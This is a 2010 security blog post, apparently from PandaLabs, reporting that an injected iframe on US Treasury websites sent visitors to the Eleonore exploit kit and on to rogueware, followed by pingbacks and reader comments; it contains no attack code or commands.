Updated @ 8PM PST 5/3/2010 — Added Information about Rogueware and two additional government sites affected
Time and time again we talk about how amateur and professional hackers alike are able to use automated toolkits which can identify security vulnerabilities on a computer and exploit them with little or no technical skill necessary for the cyber criminal. The spirited script kiddies behind these kits have been running havoc on the Internet, as many of the kits available can be downloaded in underground forums for free. Today, we came across an embedded iframe inside of the Department of Treasury website. This iframe (pictured below) is used to silently load one of the elenore exploit kits main URL’s, which in turn determines what’s the best available exploitation method for the browser accessing the site.
US Treasury Website – Injected iframe
Upon accessing the US Treasury website (treas.gov, bep.gov, or moneyfactory.gov), the iframe silently redirects victims through statistic servers and exploit packs which will carry the victim onto the second stage of the attack.
US Treasury Website Hack (Session Log)
In my case, the exploit kit figured that Java was the best method of infecting my test machine, although several exploitation methods (mainly PDF) are used by these kits. It’s still unclear what the original entry point was into the US Treasury website, and I don’t suspect that the US Government will release detailed report about the compromise, but these threats usually make their way onto websites that have outdated server software, web applications, and/or through web application security vulnerabilities such as SQL injection.
After you are infected, your web browser will start redirecting you to ads and other nasty things, such as Rogueware:
I would like to use this post to remind you all to update your web applications and web servers just as frequently as you would your own computer. Doing so will help prevent your website from being hacked and used to propagate these threats on the Internet. You, your visitors, and many others browsing the Internet will remain one step closer to a safer browsing experience on the Internet.
[...] iframe has been injected into the main site (still active) and like the previous attack on the US Treasury Website, this campaign also uses the Eleonore exploit pack to distribute the [...]
[...] U.S. Treasury Website Hacked Using Exploit Kit – pandasecurity.com [...]
[...] BTW - those two snooping “consumer protection” agencies would be located within the Federal Reserve and the U.S. Department of Treasury. Well, it seems that Treasury is having some data security problems right now. PandaLabs has located easy-as-pie hacker kits with targets that include the U.S. Treasury. [...]
[...] iframe has been injected into the main site (still active) and like the previous attack on the US Treasury Website, this campaign also uses the Eleonore exploit pack to distribute the [...]
[...] test. If they did run a pen test, well then may be its time for a new testing vendor. Panda gives a detailed breakdown. This is the kind of thing that doesn’t inspire confidence in the government’s [...]
[...] and PandaLabs are reporting that the web sites of the U.S. Bureau of Engraving and Printing (bep.treas.gov; moneyfactory.gov) are serving client-side vulnerabilities that ultimately expose [...]
Yes, Sean-Paul contacted the victims before publishing anything. Good question though
Do these researchers contact the victims before they announce these findings?
[...] http://pandalabs.pandasecurity.com/usa-treasury-website-hacked-using-exploit-kit/ Weiterempfehlen und Bookmarken: [...]
[...] more information on its attack read the panda lab blog Share and [...]